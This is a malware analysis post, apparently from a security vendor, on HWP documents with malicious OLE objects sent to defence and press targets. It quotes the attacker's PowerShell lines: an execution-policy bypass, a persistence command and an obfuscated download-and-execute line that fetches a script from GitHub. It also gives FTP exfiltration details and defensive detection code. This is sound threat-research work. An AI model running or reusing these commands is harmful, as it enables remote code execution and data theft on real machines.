Warning Against HWP Documents Embedded with Malicious OLE Objects

AhnLab Security Emergency response Center (ASEC) found HWP documents with embedded malicious OLE objects targeting individuals in specific sectors such as national defense and the press. The malware is presumed to be distributed mainly through download URLs or email attachments. The file names of the distributed documents relate to national defense, unification, education, and broadcasting, suggesting that the malware targets professionals working in these areas.

The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] operates much like the malware covered in a previous post [1] and uses the same FTP server password. These similarities lead us to believe that the same threat actor created them.

The figure below shows a brief flow of operations of each type.

Figure 1. Operation process

<Type 1>

This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.

| Date | File name |
| --- | --- |
| May 25, 2023 | Unification** cue sheet May 29 Mon.hwp |
| May 25, 2023 | 20230508_ProfessorMeetingMaterial_NewTemplate.hwp |
| May 25, 2023 | (***)2023-05-30 Material for Professor Meeting.hwp |
| May 30, 2023 | Payment Receipt (Chief ***).hwp |
| May 30, 2023 | (Template)Payment Receipt_Congratulatory and Condolence Money.hwp |
| June 22, 2023 | 20230512_MyungbakScenario_Details.hwp |
| June 22, 2023 | 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp |
| June 22, 2023 | Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp |
| June 23, 2023 | [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp |
| June 29, 2023 | National Defense and Protection Sacrificed to Political Disputes.hwp |
| July 11, 2023 | ** Unification April 30 2023 (Sun).hwp |
| July 17, 2023 | Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp |
| July 20, 2023 | 42- Wagner's Lesson (Aug 2023).hwp |
| July 24, 2023 | [Template1] Business Budget Issue Request.hwp |
| Aug 14, 2023 | Dissertation Evaluation (** Kwon).hwp |
| Sep 01, 2023 | Evidentiary Documents of Incentive Payment.hwp |
| Sep 04, 2023 | ** Unification Sep 06 Final Wednesday.hwp |
| Sep 06, 2023 | ** Kim_Statement of Honorarium Payment.hwp |
| Sep 19, 2023 | [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp |
Table 1. Identified HWP document file names

The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.

Figure 2. Document content

In these documents, the threat actor embedded an OLE object that is larger than the page itself (see Figure 3), so the OLE object runs no matter where on the page the user clicks.

Figure 3. OLE object embedded in the document

The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.

Figure 4. OLE object embedded in HWP files
Figure 5. Message box displayed when the OLE object is clicked

At the time of analysis, the URLs were no longer reachable, so no further anomalous behavior could be observed. The malicious URLs identified so far are listed below. Each document uses a different parameter value, which suggests that the documents are being distributed to specific individuals.

  • hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
  • hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]
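As an added example (not code from the original post or from ASEC), the following Python heuristic shows how a defender might triage an object stream carved from an HWP file using the two traits described above: a body dominated by filler bytes and an embedded URL that carries a per-document parameter. The two sample objects, their filler byte values, the `example.invalid` host and the scaled-down size threshold used in the demo are all constructed assumptions; the real objects in this campaign exceed 5 MB, which is the default threshold.

```python
import re
from collections import Counter

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%\-\[\]]+")

# Constructed stand-ins for object streams carved from an HWP file. The filler
# byte values, the example.invalid host and the sizes are assumptions; the real
# objects in this campaign exceed 5 MB, so the demo threshold below is scaled down.
SAMPLE_OBJECT = (
    b"\x00" * 200_000
    + b"http://example.invalid/dashboard/explore/starred?hwpview=SAMPLE"
    + b"\x00" * 100_000
)
SAMPLE_OBJECT_UTF16 = (
    b"\xff" * 50_000
    + "http://example.invalid/get/account/view?myact=SAMPLE".encode("utf-16-le")
    + b"\xff" * 50_000
)


def find_urls(blob: bytes) -> list:
    """Return unique URLs stored as 8-bit or UTF-16LE text, in order of appearance."""
    found = []
    # latin-1 maps every byte to one code point, so 8-bit text survives unchanged;
    # the second pass catches URLs that an OLE stream stores as UTF-16LE.
    for text in (blob.decode("latin-1"), blob.decode("utf-16-le", errors="ignore")):
        found.extend(URL_RE.findall(text))
    return list(dict.fromkeys(found))


def filler_ratio(blob: bytes) -> float:
    """Share of the object taken by its single most common byte value."""
    if not blob:
        return 0.0
    _, count = Counter(blob).most_common(1)[0]
    return count / len(blob)


def assess_object(blob: bytes, size_threshold: int = 5 * 1024 * 1024,
                  filler_threshold: float = 0.9) -> dict:
    """Flag an object that is both padded out with filler and carries a parameterised URL."""
    urls = find_urls(blob)
    ratio = filler_ratio(blob)
    indicators = []
    if len(blob) >= size_threshold and ratio >= filler_threshold:
        indicators.append("oversized object dominated by a single filler byte")
    if any("?" in url for url in urls):
        indicators.append("embedded URL with a per-document query parameter")
    return {
        "size": len(blob),
        "filler_ratio": round(ratio, 4),
        "urls": urls,
        "indicators": indicators,
        "suspicious": len(indicators) == 2,
    }


if __name__ == "__main__":
    for name, blob in (("ascii", SAMPLE_OBJECT), ("utf16", SAMPLE_OBJECT_UTF16)):
        # 100 KB threshold for the scaled-down samples; keep the default for real objects
        print(name, assess_object(blob, size_threshold=100_000))
```

The filler ratio is deliberately simple (most common byte value) so that the check stays cheap on multi-megabyte objects; a compression ratio would work as well. Requiring both indicators keeps legitimate large embedded objects, such as images, from being flagged on size alone.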

<Type 2>

This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.

| Date | File name |
| --- | --- |
| July 31, 2023 | test.hwp |
| July 27, 2023 | Honorarium Information_aa.hwp |
| Aug 31, 2023 | Consultation Request.hwp |
| Sep 01, 2023 | Honorarium Template.hwp |
| Sep 14, 2023 | main.hwp |
| Oct 04, 2023 | test1.hwp |
Table 2. Identified HWP document file names

The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).

Figure 6. test1.hwp document content

When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.

zz.bat contains PowerShell commands that connect to the GitHub address stored in oz.txt, then download and execute additional data from it.

Figure 7. zz.bat file content
Figure 8. oz.txt file content

Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.

Figure 9. Code in hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt
Figure 10. Script codes uploaded on GitHub

down.txt, info.txt, and upload.txt, seen in Figure 10, each hold an obfuscated piece of data. After connecting to the corresponding URL, the script deobfuscates the data with a fixed key value and then executes it.

The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.

| Function name | Feature |
| --- | --- |
| mainFunc | Changes the PowerShell execution policy; then runs the other functions in the order getinfo, uploadResult, downCommand |
| getinfo | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt; collects user PC information such as network configuration information |
| uploadResult | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt; uploads the collected information to the threat actor's FTP server |
| downCommand | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt; creates additional malicious files |
Table 3. Features of each function

The function mainFunc, which is executed first, changes the current user's PowerShell execution policy with the following command so that the PowerShell script downloaded later on can run.

  • Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Figure 11. mainFunc code

The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%\Ahnlab\Ahnlab.hwp.

Figure 12. getinfo code

The table below shows the collected pieces of information.

| Command | Collected information |
| --- | --- |
| Get-ChildItem ([Environment]::GetFolderPath("Recent")) | List of recently used files |
| ipconfig /all | List of network configurations |
| Get-process | List of processes |
Table 4. Collected information
Figure 13. The created Ahnlab.hwp file

The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.

Figure 14. Deobfuscated code of upload.txt
  • Address: plm.myartsonline[.]com
  • User name: 4154836

The function downCommand, which is executed afterward, runs an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file so that the malware can maintain persistence: to have the malicious script executed repeatedly, the threat actor creates an LNK file in the Startup folder.

Figure 15. The created LNK file

The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command that executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run again.

  • LNK file command
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log');invoke-expression $x}
  • thumbs.log data
    [string]$a = {(New-Object Net.WebClient).Doqwertyutring('hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt')};$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c
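As an added example that is not part of the original post, here is a small Python rule set a defender could run over PowerShell command lines (for instance, lines recovered from script block logging) to flag the three patterns this post shows: the execution policy bypass from mainFunc, the hidden-window invoke-expression of a file on disk from the LNK command, and a download method name hidden by a string .replace() call as in thumbs.log. The sample lines are constructed from the commands quoted above, with `[user]` and `EXAMPLE-ACCOUNT` as placeholders; the rule names are the example's own.

```python
import re

# Constructed sample lines modelled on the commands quoted in the post.
# "[user]" and "EXAMPLE-ACCOUNT" are placeholders; the last line is benign.
SAMPLE_LINES = [
    "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden "
    "-command &{[string]$x= [IO.File]::ReadAllText('C:\\Users\\[user]\\AppData\\Roaming"
    "\\Microsoft\\Windows\\thumbs.log');invoke-expression $x}",
    "[string]$a = {(New-Object Net.WebClient).Doqwertyutring("
    "'https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/repo/main/pq.txt')};"
    "$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c",
    "Get-ChildItem -Path C:\\Reports -Filter *.csv",
]

DOWNLOAD_METHODS = ("downloadstring", "downloadfile", "downloaddata")
# .replace('old','new') with literal string arguments (PowerShell's String.Replace)
REPLACE_CALL = re.compile(
    r"""\.replace\(\s*['"]([^'"]*)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""", re.I)
URL_RE = re.compile(r"https?://[^\s'\"(){}<>]+", re.I)
INVOKE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)


def deobfuscate_replace(line: str) -> str:
    """Apply every literal .replace('old','new') found in the line to the whole line.

    String.Replace is case-sensitive and replaces all occurrences, which is what
    str.replace does too, so a method name split by this trick reappears intact.
    """
    text = line
    for old, new in REPLACE_CALL.findall(line):
        if old:
            text = text.replace(old, new)
    return text


def analyze_line(line: str) -> dict:
    """Return the rules one command line triggers plus any URLs it references."""
    lowered = line.lower()
    normalized = deobfuscate_replace(line)
    norm_lower = normalized.lower()
    invokes = INVOKE_RE.search(normalized) is not None
    rules = []
    # 1. execution policy relaxed for the current user
    if re.search(r"set-executionpolicy\b.*\bbypass\b", lowered):
        rules.append("execution_policy_bypass")
    # 2. hidden window that reads a file from disk and evaluates it
    if "-windowstyle hidden" in lowered and "readalltext" in lowered and invokes:
        rules.append("hidden_window_iex_from_file")
    # 3. a WebClient download method only visible after emulating .replace()
    hidden_before = not any(m in lowered for m in DOWNLOAD_METHODS)
    visible_after = any(m in norm_lower for m in DOWNLOAD_METHODS)
    if hidden_before and visible_after:
        rules.append("replace_obfuscated_download")
    # 4. script fetched from a raw GitHub URL and evaluated in place
    urls = URL_RE.findall(normalized)
    if invokes and any("raw.githubusercontent.com" in u.lower() for u in urls):
        rules.append("remote_script_fetch")
    return {"rules": rules, "urls": urls, "normalized": normalized}


def scan(lines):
    """Return (index, rules) for every line that triggers at least one rule."""
    hits = []
    for i, line in enumerate(lines):
        rules = analyze_line(line)["rules"]
        if rules:
            hits.append((i, rules))
    return hits


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_LINES):
        print(f"line {index}: {', '.join(rules)}")
```

The emulation step matters because a plain substring match for DownloadString never sees it in the thumbs.log line; only after the replace() is applied does the method name, and with it the fetch-and-evaluate pattern, become visible to rule 3 and rule 4.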

While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.

With the malware from the post in June [2] also being distributed through HWP documents, multiple malicious HWP documents are currently in circulation. When opening an HWP document, users must carefully check its author and the sender.

[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
